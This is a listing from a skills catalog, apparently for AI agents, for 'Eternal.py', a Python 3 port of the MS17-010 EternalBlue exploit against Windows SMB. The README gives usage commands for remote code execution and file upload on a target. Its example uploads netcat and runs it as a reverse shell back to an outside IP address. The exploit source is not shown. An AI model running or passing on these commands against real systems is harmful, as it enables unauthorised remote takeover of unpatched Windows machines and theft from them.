SkillAgentSearch skills...

Eternal.py

This is an exploit for Eternal Blue explotation. Is a python 3 implementation from zzz_exploit.py.

Install / Use

/learn @ArtesOscuras/Eternal.py
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

Eternal.py

This is a python3 implementation from the zzz_exploit. (https://github.com/worawit/MS17-010)

Original exploit was based on eternal sinergy and eternal champion. This is a partially translation to python3, with the "mysmb.py" included. Tested in windows 7, windows server 2003, and windows 10. Other Operative Systems may require to finish the translation to python3. <br>

usage:

python3 eternal.py -i <remote ip> -t <file to transfer> -o <output file name>

python3 eternal.py -i <remote ip> -c <rce to execute>

NOTE: files transfered will appear inside remote host -> c:\<output file name>

example: python3 eternal.py -i 10.10.10.40 -t nc.exe -o nc.exe -c 'c:/nc.exe 10.10.15.8 4455 -e cmd.exe'

<br>

If this exploit was usefull to you remember to subscribe to my youtube channel -> https://www.youtube.com/@artes_oscuras

Related Skills

View on GitHub
GitHub Stars7
CategoryDevelopment
Updated6mo ago
Forks0

Languages

Python

Security Score

62/100

Audited on Sep 11, 2025

No findings